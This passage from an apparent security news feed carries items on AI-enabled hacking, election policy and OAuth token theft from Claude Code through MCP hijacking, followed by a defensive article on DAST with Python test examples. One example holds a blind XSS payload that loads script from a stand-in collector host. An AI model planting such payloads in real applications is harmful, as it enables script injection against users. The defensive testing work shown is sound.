
Sen. Schumer seeks DHS plan on AI cyber coordination with state, local governments

8 May 2026 at 13:20

The Senate’s top Democrat called on the Department of Homeland Security Friday to work closely with state and local governments to defend against artificial intelligence-strengthened hacks. 

Senate Minority Leader Chuck Schumer, D-N.Y., wrote to DHS Secretary Markwayne Mullin to make sure state, local, tribal and territorial (SLTT) governments aren’t left behind as AI models advance, posing new hacking threats.

“There is a race between cybersecurity defenders and AI-enabled hacking — and there’s no time to waste,” Schumer wrote.

“While the White House has reportedly begun hosting meetings about its internal security priorities following these frontier AI cyber breakthroughs, it is glaringly obvious that the Department of Homeland Security needs an updated plan for coordinating these efforts with [state, local, tribal and territorial] governments and implementing procedures to reduce the risk of disruptive cyberattacks enabled by frontier AI,” he stated.

Schumer said he was worried about the capabilities of DHS and its Cybersecurity and Infrastructure Security Agency to carry out that coordination, given federal funding cuts to the Multistate Information Sharing and Analysis Center, and the lack of a Senate-confirmed CISA director for the duration of the second Trump administration.

Schumer wants a plan from DHS by July 1 on coordinating with state and local governments on a range of questions, such as how to identify top AI talent, carry out rapid patching and conduct risk assessments.

“AI is changing the cyber battlefield fast — and we cannot let hackers get there first,” Schumer said in comments accompanying the letter. “Hospitals, power grids, water systems, schools, elections, and emergency services cannot be left exposed while criminal gangs and state-backed hackers race to exploit new AI tools. DHS must immediately help states and localities find and fix vulnerabilities before Americans are hit with outages, disruptions, and attacks that could put lives and livelihoods at risk.”

CISA is using AI to help on the defensive side internally, agency officials recently said.

The post Sen. Schumer seeks DHS plan on AI cyber coordination with state, local governments appeared first on CyberScoop.

Claude Code OAuth Tokens Can Be Stolen Through Stealthy MCP Hijacking

7 May 2026 at 10:33

Mitiga researchers say attackers can silently redirect Claude Code MCP traffic, intercept OAuth tokens, and maintain persistent access to connected SaaS platforms.

The post Claude Code OAuth Tokens Can Be Stolen Through Stealthy MCP Hijacking appeared first on SecurityWeek.

Realistic threats

27 April 2026 at 03:42
ON SECURITY By Susan Bradley One thing the World Wide Web has done in recent years is introduce new ways to scam, trick, entice, and generally be a drag on our time — and potentially a hit to our pocketbooks. Here are some threats I’ve seen in recent months. Read the full story in our […]

OpenAI expands Trusted Access for Cyber program with new GPT 5.4 Cyber model 

By: djohnson
15 April 2026 at 09:59

OpenAI said it is expanding its Trusted Access for Cyber program to “thousands of individuals and organizations,” who will use the company’s technology to root out bugs and vulnerabilities in their products.

The program will also incorporate GPT 5.4 Cyber, a new variant of ChatGPT that OpenAI says is specifically optimized for cybersecurity tasks. OpenAI’s goal with this release is to make advanced cybersecurity tools more widely accessible.

The company said access to the program and cybersecurity-focused model will still be governed by “strong” Know-Your-Customer and identity verification rules to help prevent the model’s spread to bad actors.

“Our goal is to make these tools as widely available as possible while preventing misuse,” the company said in a blog post published Tuesday. “We design mechanisms which avoid arbitrarily deciding who gets access for legitimate use and who doesn’t.”

OpenAI’s announcement comes one week after Anthropic rolled out Project Glasswing, a similar effort that seeks to provide major tech companies with Claude Mythos, an unreleased model that Anthropic officials have claimed is too dangerous to sell commercially.

OpenAI officials noted that they publicly announced the Trusted Access for Cyber program months earlier, and they have avoided drawing direct comparisons between GPT 5.4 Cyber and Mythos.

Cybersecurity experts in the U.S. and UK have described Mythos as a significant improvement from previous frontier models around identifying (and potentially exploiting) cybersecurity vulnerabilities, though there remains debate and speculation about the model’s ultimate impact on information security.  

Similarly, GPT 5.4 Cyber has been fine-tuned for testing and vulnerability research, though OpenAI wants to make iterative improvements to the program as lessons are learned.

The company has plans to allow a broader group of cyber operators to use the model to protect critical infrastructure, public services and other digital systems. The company said it is also leery of having too much influence over which industries or sectors ultimately take part in the program.

“We don’t think it’s practical or appropriate to centrally decide who gets to defend themselves,” the blog stated. “Instead, we aim to enable as many legitimate defenders as possible, with access grounded in verification, trust signals, and accountability.”

The post OpenAI expands Trusted Access for Cyber program with new GPT 5.4 Cyber model  appeared first on CyberScoop.

Wyden warns Social Security chief: Trump’s voter database is ‘blatant voter suppression’

By: djohnson
3 April 2026 at 12:30

Sen. Ron Wyden, D-Ore., warned Social Security Administration chief Frank Bisignano that any follow-through on President Donald Trump’s executive order creating a new database of U.S. voters using agency data would be viewed by Democrats as a conscious choice on the part of SSA officials to participate in “blatant voter suppression.”

“Facilitating Donald Trump’s directive to create a flawed voter database would be willing participation in blatant voter suppression ahead of consequential midterm elections,” Wyden, the top Democrat on the Senate Finance Committee, wrote in a letter to Bisignano sent Friday.

The executive order, issued March 31, directs the Homeland Security secretary, the director of U.S. Citizenship and Immigration Services and the commissioner of the Social Security Administration to compile lists of American voters for each state, including their supposed citizenship status.

To build the lists, the agencies would rely on the controversial Systematic Alien Verification for Entitlements database that DHS has been building under the Trump administration, as well as Social Security and federal citizenship and naturalization records.

Those lists would then be transmitted to states, most of which have already rejected previous Trump administration efforts to collect voter data or dictate voter registration lists. Another section of the order would direct the postmaster general to develop a similar state-by-state list of voters eligible to vote by mail.

“The clear intent of this executive order is to undermine vote-by-mail and disenfranchise eligible voters,” Wyden wrote. “SSA has a duty to ensure its data is not misused as part of this effort.”

Wyden echoed numerous state officials and election experts in calling the Trump administration’s executive order an unconstitutional encroachment by the executive branch on election authorities that the U.S. Constitution clearly delineates to Congress and the states.

The White House’s executive order has already been challenged in lawsuits from state officials and voting rights advocates, and a previous, less ambitious executive order issued last year that attempted to assert similar executive branch authorities was largely overturned by U.S. courts.

Wyden’s missive essentially asks Bisignano to consider whether following the Trump administration’s order would conflict with his responsibility to safeguard Social Security records under laws like the Privacy Act and the Social Security Act.

He asks how the agency will ensure it’s not disenfranchising voters, and whether it sought permission from citizens to use their Social Security data for a federal elections list, noting that the agency’s own regulations limit the sharing of Social Security data to “routine use for determining eligibility or amount of benefit in a health or income maintenance program.”

Expanding the agency’s role to elections — an area it has no background or experience in — would be in direct conflict with those rules.

“Simply put, sharing Americans’ personal data to DHS for creating a ‘state citizenship’ list does not meet this standard,” Wyden wrote.

The post Wyden warns Social Security chief: Trump’s voter database is ‘blatant voter suppression’ appeared first on CyberScoop.

TeamPCP Moves From OSS to AWS Environments

31 March 2026 at 09:53

After validating stolen credentials using TruffleHog, the hacking group started AWS services enumeration and lateral movement activities.

The post TeamPCP Moves From OSS to AWS Environments appeared first on SecurityWeek.

White House executive order purports to limit mail-in voting, mandate federal voter lists 

By: djohnson
31 March 2026 at 20:24

President Donald Trump signed an executive order Tuesday that purports to limit mail-in voting, though critics say the move will almost certainly be challenged in court on constitutional grounds.

The order instructs the Homeland Security secretary, the director of U.S. Citizenship and Immigration Services and the commissioner of the Social Security Administration to compile lists of American voters for each state, including their supposed citizenship status.

To build the lists, the agencies would rely on the controversial Systematic Alien Verification for Entitlements database that DHS has been building under the Trump administration, as well as Social Security and federal citizenship and naturalization records.

Those lists would then be transmitted to states, most of which have already rejected previous Trump administration efforts to collect voter data or dictate voter registration lists. The White House order instructs the Department of Justice to prioritize the investigation and prosecution of state and local officials or any others involved in the administration of federal elections who issue federal ballots to individuals not eligible to vote in a federal election.  

The order also directs the postmaster general to issue new proposed regulations that require mail-in ballots to be mailed in special envelopes that include barcodes for tracking. Crucially, it asks states ahead of time whether they intend to submit a list of voters eligible to vote by mail, and attempts to assert the authority to deny sending ballots to states that do not participate. It also claims the attorney general is entitled to withhold federal funding from noncompliant states.

The Trump administration’s previous efforts to aggressively assert executive branch authority over elections have been rebuffed by courts, with judges noting the U.S. Constitution explicitly empowers states and Congress to set the time, manner and place for elections. 

The order justifies White House involvement by claiming it has “an unavoidable duty” under Article II of the Constitution to maintain confidence in election outcomes by preventing violations of criminal law. But numerous post-election audits, investigations and recounts over decades have consistently found that criminal non-citizen voting is infinitesimally rare in U.S. elections, and most of the small number of cases that do surface turn out to be accidents or decades-old administrative errors.

Criticism from election officials, experts and Democrats in Congress was swift.

Minnesota Secretary of State Steve Simon, who has resisted demands by the DOJ to hand over state voter data, predicted the order “will meet the same fate” as previous executive orders in being struck down by courts. Other secretaries of state have issued similar statements rejecting the order’s constitutionality. 

“Our office has helped stop his actions before and we are now exploring our legal options to stop this new order from taking effect,” Simon said in a statement to CyberScoop.

He also stumped for mail-in voting, calling it a secure, trustworthy and convenient way for citizens to exercise their rights to vote. Local election officials “track every ballot” sent by mail and have a range of checks and safeguards to ensure they’re sent to only eligible voters and that voters can only cast one ballot.

“Absentee voters who choose to vote by mail must provide a matching ID number, sign their signature envelope, and have a witness sign their ballot envelope before returning their ballot,” Simon said. “All of that information is tracked digitally by election administrators. Voters are able to track the status of their ballot using our online ballot tracker tool. Any attempt to register or cast a ballot while ineligible is referred for investigation and potential prosecution.”

Sen. Alex Padilla, D-Calif., called the order a “blatant, unconstitutional abuse of power” and said he expected “immediate” lawsuits challenging its legality.

“The President and the Department of Homeland Security have no authority to commandeer federal elections or direct the independent Postal Service to undermine mail and absentee voting that nearly 50 million Americans relied on in 2024,” Padilla said in a statement. “A decade of lies about election fraud does not change the Constitution.”

David Becker, executive director for the Center for Election Innovation and Research, said the administration’s latest mandates are so far outside the constitutional limits of the executive branch they will almost certainly be halted through lawsuits. 

“Some may freak out about this, but honestly, this is hilarious,” Becker wrote on Bluesky. “It’s clearly unconstitutional, will be blocked immediately, and the only thing it will accomplish is to make liberal lawyers wealthier. He might as well sign an EO banning gravity.”

However, while lower courts have consistently struck down previous orders and lawsuits from the White House, election experts have expressed concerns that the Supreme Court’s conservative majority — which has clashed with lower courts over the Trump administration’s constitutional authority — appeared receptive to the administration’s position in a recent oral argument.

Alexandra Chandler, director of the Free and Fair Elections program at nonprofit Protect Democracy, said in a statement that the White House order “is more like an attempted executive override” of state authority over elections.

“Meant to solve for a problem that exists only in the false rhetoric of the Trump administration and its political fortunes, the [order] is a classic example of their playbook to deceive the American people and disrupt the election process in order to deny any future results that don’t suit them,” Chandler said.

The post White House executive order purports to limit mail-in voting, mandate federal voter lists  appeared first on CyberScoop.

ODNI tackles AI, threat hunting, app cybersecurity in year-one tech review

26 March 2026 at 18:58

A year-long effort to strengthen cybersecurity and modernize tech at U.S. intelligence agencies has led to policy standards for using AI to bolster cyber defenses, a shared repository of all apps that have undergone a cybersecurity review and more, the Office of the Director of National Intelligence announced Thursday.

An unclassified summary of cyber and tech modernization work under the first year of DNI Tulsi Gabbard’s stewardship states that the office has expanded the automation of threat hunting across intelligence community networks. (The Cybersecurity and Infrastructure Security Agency conducts threat hunting across federal civilian agencies.)

The ODNI also has developed a zero-trust strategy that shifts “to a data-centric security model that protects information regardless of location or network,” according to the summary.

“Over the past year, we have taken meaningful steps to begin fulfilling that responsibility through the largest IC-wide technology investment and modernization effort in history,” Gabbard said in a news release. “President Trump’s Intelligence Community is moving faster and more decisively on cybersecurity modernization and investments in IT than ever before, delivering stronger defenses, greater efficiency, and real cost savings for the American people.”   

It constitutes the first significant cybersecurity announcement out of the office under Gabbard and the second Trump administration.

While the year-long effort began before the recent release of a national cyber strategy, the ODNI initiatives reflect many of its goals, including better protection of federal networks, advancing artificial intelligence for defensive purposes and going on offense against cyber adversaries.

The ODNI directed its National Counterintelligence and Security Center “to proactively combat foreign intelligence actors seeking to engage in cyber-attacks against U.S. interests,” according to the summary. 

The idea of an intelligence community repository of cybersecurity authorizations is to save both time and money, as it would allow agencies to reuse the app testing that other agencies have already done rather than repeat it.

On AI, the ODNI is “developing the policy framework, governance, and standards necessary to accelerate AI adoption for cybersecurity and other critical technology,” the summary states.

“Protecting our nation’s most sensitive information from those who seek to exploit it, while making sure our intelligence professionals have the tools and access they need to do their jobs, is not optional. It is essential to our national security,” Gabbard said. 

Gabbard’s appearance earlier this year during an FBI search of an elections office in Georgia has drawn congressional scrutiny, an appearance she has defended in part by citing her office’s role in coordinating and analyzing intelligence related to cybersecurity. Gabbard’s own personal cybersecurity practices prior to taking the job of DNI have also raised questions.

The post ODNI tackles AI, threat hunting, app cybersecurity in year-one tech review appeared first on CyberScoop.

State officials, election experts question California sheriff’s seizure of ballots

By: djohnson
23 March 2026 at 15:50

A California county sheriff and Republican contender for the state’s gubernatorial race has seized 650,000 physical ballots from Riverside County, saying they were part of an investigation into election fraud tied to redistricting wars.

State officials and election security experts say that the underlying allegations are spurious and local law enforcement do not have the authority to unilaterally investigate or validate election results.

Riverside County Sheriff Chad Bianco said at a news conference Friday that he intended to conduct a hand count of the ballots, which were tied to elections last November, and “compare that result to the total votes recorded.”

In a March 6 letter, California Attorney General Rob Bonta directed Bianco to pause the investigation until the state could review “the factual and legal basis” for the probe and seizure.

Based on an initial review of the warrants and affidavits in the case, Bonta wrote that his “office has serious concerns as to whether probable cause existed to support the issuance of the warrants, and whether your office presented the magistrate with all available evidence as required by law.” 

While Bonta’s letter does not describe the underlying content of the search warrants, it points to a public presentation made by a resident at a Feb. 10 Riverside County Registrar of Voters meeting that “addresses the alleged vote discrepancy that appears to be the basis of your investigation.”

In that meeting, an individual identifying himself as “Errol” — wearing a “Trump 2028” hat — alleged the council had participated in local, state and federal election fraud.

At several points, the individual said he relied on Google for information on individuals and companies he was accusing of receiving improper payments. At another point, he claimed the Riverside County auditor would not disclose the purpose behind thousands of pages of county payments, before saying “you’re not getting the files, I got them put away.”

“We have a lot of problems, you guys. You’ve committed serious fraud here, forever,” the individual alleged, adding that he hoped the members of the council were imprisoned.

Bonta accused Bianco of “flagrantly violating my directives” under the California State Constitution, and threatened court action should he proceed with the investigation and hand recount.

The act by Bianco — who is running third in the state’s open primary for governor this month, per an Emerson College poll — is the second such seizure of ballots to take place this election cycle, following the FBI’s raid of Fulton County, Georgia’s election office.

Gowri Ramachandran, director of elections and security at the Brennan Center for Justice, told CyberScoop that the election allegedly being investigated wasn’t a close race. Further, as in virtually every election, candidates and parties had established avenues to contest irregularities or results, including automatic recounts or recounts paid for by candidates or campaigns, along with state courts that regularly adjudicate questions of election outcomes.

“It’s important for people to know none of those processes involve someone coming in and haphazardly coming in and grabbing the ballots,” she said, adding: “I worry if it happens closer to an actual election what it could do to interfere with it.”

Ramachandran said that by seizing physical ballots, which she called “the gold standard” we use for determining ground-level truth about voter intent, Bianco was disrupting the chain of custody that is one of the key processes designed to give voters trust in their elections.

“It should just be a really high bar, not just, ‘I’m suspicious, I want to do a fishing expedition,’” she said. “That’s not enough to have someone who doesn’t have any experience in counting ballots or keeping them safe [to] just come in and grab all that stuff.”

Bonta’s suggestion that Bianco did not materially inform the courts echoes what Fulton County officials alleged in their own lawsuit, which accused the FBI of presenting the judge with a “flagrantly misleading narrative” that omitted key evidence, undermining the government’s basis for investigating the 2020 ballots. 

The post State officials, election experts question California sheriff’s seizure of ballots appeared first on CyberScoop.

From Code to Runtime: The Critical Role of DAST in Application Security

5 March 2026 at 09:26

Regardless of where you are in your application security maturity, dynamic application security testing (DAST) is a program staple in a few key ways:

  1. It satisfies compliance requirements for runtime-related vulnerabilities. 

  2. DAST catches vulnerabilities in the running web application, yielding findings that may be missed in static code testing.

  3. It is security-driven with little overhead in configuration/maintenance from development or application teams.

Because web apps power mission-critical operations, and because AI agents and automation increasingly drive key processes within those apps at scale, continuous DAST is essential to identifying and remediating weaknesses before they lead to costly data breaches.

Compliance requirements

DAST helps satisfy multiple compliance requirements by simulating real-world attacks against a running application to find vulnerabilities. While DAST alone doesn’t make you compliant, it supports key controls in many security standards and regulations. The following seven standards and frameworks show which requirements DAST supports and how it helps secure each:

PCI DSS

Payment Card Industry Data Security Standard (PCI DSS) is the global security standard for any organization that stores, processes, or transmits payment-card data. DAST directly supports PCI compliance by performing vulnerability scans against live web apps.

Requirements satisfied (v3.2.1 numbering; in v4.0 these controls live under Requirements 6.3 and 6.4): 

  • Requirement 6.1 & 6.2: Identifying and addressing vulnerabilities.

  • Requirement 6.6: All public-facing web applications must be either:

    • Protected with an application-layer firewall (WAF), or

    • Tested for vulnerabilities (e.g., via DAST) at least annually and after any change.

Caveat: under PCI DSS v4.0, Requirement 6.4.2 (mandatory since 31 March 2025) requires an automated technical solution that continually detects and prevents web-based attacks on public-facing web applications. The either/or option above no longer applies there, so DAST supplements that control rather than substituting for it.


OWASP Top Ten

While the Open Worldwide Application Security Project (OWASP) is not a compliance framework, its Top Ten list of web application risks is frequently referenced by industry and regulatory standards and by auditors. 

Requirements satisfied:

  • DAST tools are typically benchmarked against, and report findings in terms of, OWASP Top 10 categories (e.g., injection such as SQLi, XSS, SSRF, security misconfiguration), so a scan report maps directly onto the list.


HIPAA

The Health Insurance Portability and Accountability Act (HIPAA) sets national standards for protecting electronic protected health information (ePHI). DAST supports risk assessment by identifying live vulnerabilities with the potential to expose such information.

Requirements satisfied: 

  • Security Rule (45 CFR § 164.308 & § 164.312):

    • Requires organizations to perform regular risk assessments.

    • Includes application-level vulnerabilities as part of overall system security.


ISO/IEC 27001

ISO/IEC 27001 is the international standard that specifies requirements for an information security management system (ISMS). DAST helps fulfil its technical vulnerability management control by scanning running applications for known and exploitable vulnerabilities.

Requirements satisfied: 

  • Annex A.12.6.1 (2013 edition; control 8.8 in ISO/IEC 27001:2022): Management of technical vulnerabilities – requires timely detection and remediation of vulnerabilities.


NIST SP 800-53/800-171

The National Institute of Standards and Technology (NIST) is a U.S. federal agency that develops measurement science, standards, and technology to boost innovation and economic security. SP 800-53 is its catalog of security and privacy controls for federal systems; SP 800-171 derives from it the requirements for protecting controlled unclassified information (CUI) on non-federal systems. DAST can be used to meet these technical controls.

Requirements satisfied: 

  • RA-5 (vulnerability monitoring and scanning; 800-171 Rev. 2 requirement 3.11.2): Requires scanning of systems and applications.

  • SI-2 (flaw remediation; 800-171 Rev. 2 requirement 3.14.1): Identify, report, and fix flaws in software.


SOC 2

System and Organization Controls 2 (SOC 2) is an independent attestation report (from a licensed CPA firm) that evaluates whether a service organization’s controls are suitably designed and, for a Type 2 report, operating effectively over the audit period. Scheduled DAST reports and their remediation records are evidence that vulnerability detection controls operated over time.

Requirements satisfied: 

  • Under the "Security" Trust Services Criteria, particularly:

    • CC4.1: Ongoing and separate evaluations of whether controls are functioning.

    • CC7.1/CC7.2: Detect new vulnerabilities and susceptibilities to newly discovered ones (CC7.1) and monitor for anomalous activity (CC7.2).


GDPR

General Data Protection Regulation (GDPR) harmonizes privacy rules across the EU and sets requirements for how organizations collect, use, share, and protect personal data. DAST can be part of regular security testing under GDPR, especially if the app processes personal data.

Requirements satisfied: 

  • Article 32 – Security of Processing:

    • Organizations must ensure the ongoing confidentiality, integrity, availability and resilience of processing systems and services.

    • Requires a process for regularly testing, assessing and evaluating the effectiveness of security measures.

Missed findings

Static application security testing (SAST) tools are effective at flagging insecure patterns in isolation, but they often miss the application context needed to decide whether a pattern actually introduces risk, and some vulnerability classes never appear as a pattern in source at all. Here are some examples of findings that can be overlooked:

Forced browsing

Forced browsing (a form of broken access control, closely related to insecure direct object reference, or IDOR) occurs when:

  • A user can manually access restricted resources (files, endpoints, or actions) by guessing or modifying a URL.

  • There are missing access controls or authorization checks.

Example: A user who is not an admin changes the URL in the address bar to

https://example.com/admin/settings

The page exists and the app still serves it, because nothing on that route checks the caller’s role before rendering.

SAST struggles to detect these findings due to:

  • Lack of visibility into runtime access control

    • SAST scans source code, but can’t simulate user roles or sessions.

    • It doesn’t know who should or shouldn't be able to access a specific path.

  • Abstracted access control logic

    • Authorization might be handled via middleware, annotations, config files, or external services (e.g., OAuth).

    • SAST often can’t follow the full enforcement logic, especially if it's custom or dynamic.

  • Lack of awareness around routing and resource exposure

    • SAST doesn’t map which endpoints exist versus which are intended to be public.

    • It can’t verify which files/resources are accessible through URLs.
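The following is an added example, not code from the original article: a DAST-style forced-browsing check run against a toy in-process web app. It does what a static scanner cannot, namely presenting an anonymous session and a low-privilege session to each restricted route and recording which ones answer 2xx. The app, its routes, roles and session tokens are constructed for illustration; the `enforce_auth` switch models the missing authorization check described above.

```python
"""Added example (not from the original article): DAST-style forced-browsing
check against a toy app. Routes, roles and tokens are constructed."""
from dataclasses import dataclass, field
from typing import Optional

# Constructed sessions: token presented by the checker -> role the app maps it to.
SESSIONS = {"tok-admin": "admin", "tok-user": "user"}


@dataclass
class ToyApp:
    """Minimal router. enforce_auth=False models the bug: the route exists and
    renders, but the role check is never consulted before serving it."""
    enforce_auth: bool
    # path -> roles allowed to view it; None means public
    acl: dict = field(default_factory=lambda: {
        "/": None,
        "/account": {"user", "admin"},
        "/admin/settings": {"admin"},
        "/admin/users/42": {"admin"},
    })

    def get(self, path: str, token: Optional[str]) -> int:
        if path not in self.acl:
            return 404
        allowed = self.acl[path]
        if allowed is None:
            return 200
        if not self.enforce_auth:          # vulnerable variant: serve regardless of caller
            return 200
        role = SESSIONS.get(token)
        if role is None:
            return 401
        return 200 if role in allowed else 403


def forced_browsing_findings(app: ToyApp, restricted_paths, low_priv_token: str) -> list:
    """Probe every restricted path anonymously and as a low-privilege user.
    Any 2xx is a broken-access-control finding. This role/session simulation
    is exactly the runtime context a source-only scanner lacks."""
    findings = []
    for path in restricted_paths:
        for label, token in (("anonymous", None), ("low-privilege", low_priv_token)):
            status = app.get(path, token)
            if 200 <= status < 300:
                findings.append({"path": path, "as": label, "status": status})
    return findings


# Constructed list of routes the tester believes should require admin.
RESTRICTED = ["/admin/settings", "/admin/users/42"]


def scan(enforce_auth: bool) -> list:
    return forced_browsing_findings(ToyApp(enforce_auth), RESTRICTED, "tok-user")


if __name__ == "__main__":
    for f in scan(enforce_auth=False):
        print(f"FINDING {f['path']} reachable as {f['as']} (HTTP {f['status']})")
    print("hardened app findings:", scan(enforce_auth=True))
```

Against a real target the same loop issues HTTP requests with two cookie jars (none, and a freshly registered low-privilege account) over a crawled or seeded list of privileged routes; a 200, or a 302 that lands on content rather than the login page, is the signal.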

Out-of-band (OOB) cross-site scripting (XSS)

Out-of-band (OOB) cross-site scripting, usually called blind XSS, is a form of stored XSS that occurs when:

  • A malicious script is injected into an application (e.g., a form, comment, or field).

  • The script doesn’t execute immediately but instead fires later, often:

    • In a different user’s browser (e.g., an admin viewing logs).

    • In an email client (e.g., via notification messages).

    • In a third-party system or admin dashboard.

These attacks are asynchronous and context-shifted, meaning they don’t happen in the direct request-response flow. SAST struggles to detect these findings due to:

  • Missing runtime context: SAST analyzes source code statically, line by line, without executing it. It doesn’t track:

    • Where the injected payload ends up.

    • How or where it's later rendered.

    • Whether it’s rendered in a dangerous context (HTML, JS, email, etc.).

  • Visibility is limited to code flow: SAST typically can’t follow data across storage layers or external systems. OOB XSS often spans:

    • User-submitted input → stored in DB.

    • Later retrieved → rendered in admin UI or email.

  • Unable to observe execution: The XSS payload doesn't fire in the original request, so SAST has no way to "see" the exploit being triggered because it doesn't execute code.
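The following is an added example, not code from the original article: a canary-based blind XSS check of the kind DAST tooling uses for the asynchronous flow above. Each injected payload carries a unique canary tied to the field it was injected into; when a privileged view later renders the data unescaped, the canary reaches a collector the tester controls and is correlated back to the injection point. The comment app, the collector host `oob.example.test` and the stand-in "admin browser" are constructed for illustration.

```python
"""Added example (not from the original article): canary-based blind XSS check
against a toy comment app. App, storage, collector URL and browser stand-in are
constructed."""
import html
import re
import uuid


class ToyCommentApp:
    def __init__(self, escape_output: bool):
        self.escape_output = escape_output
        self.comments = []          # the "database"

    def post_comment(self, author: str, body: str) -> None:
        # Stored verbatim: this is the injection point. Nothing fires here.
        self.comments.append((author, body))

    def render_admin_moderation_page(self) -> str:
        """Rendered later, in a different user's browser. The vulnerable variant
        concatenates raw input into HTML; the hardened one escapes it."""
        rows = []
        for author, body in self.comments:
            if self.escape_output:
                author, body = html.escape(author), html.escape(body)
            rows.append(f"<tr><td>{author}</td><td>{body}</td></tr>")
        return "<table>" + "".join(rows) + "</table>"


# canary id -> injection point, so a hit arriving hours later can be attributed
INJECTIONS = {}
COLLECTOR = "https://oob.example.test"          # constructed, tester-controlled host


def payload_for(field_name: str) -> str:
    canary = uuid.uuid4().hex
    INJECTIONS[canary] = field_name
    # If rendered unescaped, the script tag beacons the canary to the collector.
    return f'<script src="{COLLECTOR}/{canary}"></script>'


SCRIPT_SRC = re.compile(r'<script\s+src="https://oob\.example\.test/([0-9a-f]{32})"')


def simulate_admin_browser(page_html: str) -> list:
    """Stand-in for the admin's browser plus the collector: any live <script src>
    pointing at the collector would execute and report its canary."""
    return [m.group(1) for m in SCRIPT_SRC.finditer(page_html)]


def blind_xss_findings(app: ToyCommentApp) -> list:
    # Phase 1: inject a distinct canaried payload into every reachable field.
    app.post_comment(author=payload_for("author"), body=payload_for("body"))
    # Phase 2 (asynchronous in real life): a privileged user views the data.
    fired = simulate_admin_browser(app.render_admin_moderation_page())
    # Phase 3: correlate collector hits back to the fields that were injected.
    return sorted({INJECTIONS[c] for c in fired if c in INJECTIONS})


if __name__ == "__main__":
    print("vulnerable:", blind_xss_findings(ToyCommentApp(escape_output=False)))
    print("hardened:  ", blind_xss_findings(ToyCommentApp(escape_output=True)))
```

The design point is the per-injection canary: because the payload fires in someone else's browser, possibly days later, the only way to turn a collector hit into an actionable finding is to have recorded, at injection time, which application, field and request each canary belongs to.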

Web config findings

Settings defined in an ASP.NET web.config file can pose challenges for SAST tools. Depending on the tooling, these files may not be parsed at all, and even when they are, the tool lacks the deployment context needed to judge them, for example:

Custom error handling depends on deployment mode

<customErrors mode="RemoteOnly" />


✔ Looks fine in static analysis; it shows friendly errors to remote users.

✖ Contextual issue: RemoteOnly decides “local” by whether the request originates on the same host. If a reverse proxy on the same machine forwards all traffic, every request looks local and full stack traces are exposed despite this setting.

SSL enforcement logic in code, not in config.

<rewrite>
<!-- Missing rule for HTTPS redirection -->
</rewrite>


✔ SAST flags the absence of HTTPS redirection in web.config, which is a valid finding.

✖  Contextual issue: If HTTPS redirection is handled in middleware or at a reverse proxy (like NGINX or Azure App Gateway), then this isn't actually a security risk. SAST can’t always know that.

Authentication mode

<authentication mode="None" />


✔ SAST will likely flag this as a critical issue.

✖  Contextual issue: If the app is a microservice behind an API gateway that handles auth, this may be acceptable. A SAST tool unaware of deployment architecture may raise false positives.

Debug enabled in a non-prod environment

<compilation debug="true" />


✔ Flagged by SAST, correctly so in most cases.

✖ Contextual issue: If this web.config is only used in a staging or development slot, it might be intentional and not a production risk.

Authorization settings ignored in custom pipelines

<authorization>
  <deny users="?" />
</authorization>

✔ This looks like it blocks anonymous access.

✖ Contextual issue: If a custom authentication mechanism bypasses ASP.NET authorization modules, this setting may be ineffective, but a SAST tool won't see that unless it's deeply integrated with the entire codebase.
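As an added example (not the article's own tooling), the following Python script rates the five web.config settings above and adjusts each finding with the deployment facts a SAST tool normally cannot see. The DeploymentContext fields, the rule names and the combined sample web.config are assumptions constructed for this demonstration.

```python
import xml.etree.ElementTree as ET
from dataclasses import dataclass


@dataclass
class DeploymentContext:
    """Facts a SAST tool usually lacks; every field here is an assumption for this example."""
    environment: str = "production"            # "production", "staging" or "dev" slot
    tls_terminated_upstream: bool = False      # NGINX / gateway already forces HTTPS
    auth_at_gateway: bool = False              # API gateway authenticates every request
    custom_auth_bypasses_aspnet: bool = False  # custom module skips ASP.NET authorization
    treats_all_users_local: bool = False       # misconfig that defeats customErrors=RemoteOnly


@dataclass
class Finding:
    rule: str
    severity: str   # "high", "medium", "info" or "accepted"
    detail: str


def _has_https_rewrite(root: ET.Element) -> bool:
    """True if any <rewrite> rule redirects to an https:// URL."""
    for rule in root.iter("rule"):
        action = rule.find("action")
        if action is None:
            continue
        url = (action.get("url") or "").lower()
        if action.get("type") == "Redirect" and url.startswith("https://"):
            return True
    return False


def review_web_config(xml_text: str, ctx: DeploymentContext) -> list:
    """Rate the five settings from the article, adjusting severity by deployment context."""
    root = ET.fromstring(xml_text)
    out = []
    sw = root.find("system.web")
    if sw is None:
        return out

    # 1. customErrors: RemoteOnly is fine unless the app treats every caller as local.
    ce = sw.find("customErrors")
    mode = ce.get("mode", "") if ce is not None else "RemoteOnly"  # ASP.NET default
    if mode == "Off":
        out.append(Finding("customErrors", "high", "verbose errors shown to every client"))
    elif mode == "RemoteOnly" and ctx.treats_all_users_local:
        out.append(Finding("customErrors", "high", "RemoteOnly defeated: every caller treated as local"))

    # 2. HTTPS redirection: a missing rule is only a risk if nothing upstream enforces TLS.
    if not _has_https_rewrite(root):
        sev = "accepted" if ctx.tls_terminated_upstream else "medium"
        out.append(Finding("https-redirect", sev, "no HTTPS redirect rule in web.config"))

    # 3. authentication mode="None": critical unless a gateway authenticates for the app.
    auth = sw.find("authentication")
    if auth is not None and auth.get("mode") == "None":
        sev = "accepted" if ctx.auth_at_gateway else "high"
        out.append(Finding("authentication", sev, "ASP.NET authentication disabled"))

    # 4. compilation debug="true": a production risk, informational in a dev/staging slot.
    comp = sw.find("compilation")
    if comp is not None and comp.get("debug", "false").lower() == "true":
        sev = "high" if ctx.environment == "production" else "info"
        out.append(Finding("compilation-debug", sev, "debug build serves detailed diagnostics"))

    # 5. <deny users="?"/> blocks anonymous users only if ASP.NET authorization actually runs.
    deny_anon = any(d.get("users") == "?" for d in sw.iter("deny"))
    if deny_anon and ctx.custom_auth_bypasses_aspnet:
        out.append(Finding("authorization", "high", "deny rule never enforced: custom auth bypasses ASP.NET"))
    elif not deny_anon:
        out.append(Finding("authorization", "medium", "no deny rule for anonymous users"))

    return out


# Constructed sample: the fragments shown above combined into one web.config.
SAMPLE_WEB_CONFIG = """<configuration>
  <system.web>
    <customErrors mode="RemoteOnly" />
    <authentication mode="None" />
    <compilation debug="true" />
    <authorization>
      <deny users="?" />
    </authorization>
  </system.web>
  <system.webServer>
    <rewrite>
      <!-- Missing rule for HTTPS redirection -->
    </rewrite>
  </system.webServer>
</configuration>"""


def severities(xml_text: str, ctx: DeploymentContext) -> dict:
    """Map rule name -> severity, convenient for comparing two contexts."""
    return {f.rule: f.severity for f in review_web_config(xml_text, ctx)}


if __name__ == "__main__":
    naive = severities(SAMPLE_WEB_CONFIG, DeploymentContext())
    informed = severities(SAMPLE_WEB_CONFIG, DeploymentContext(
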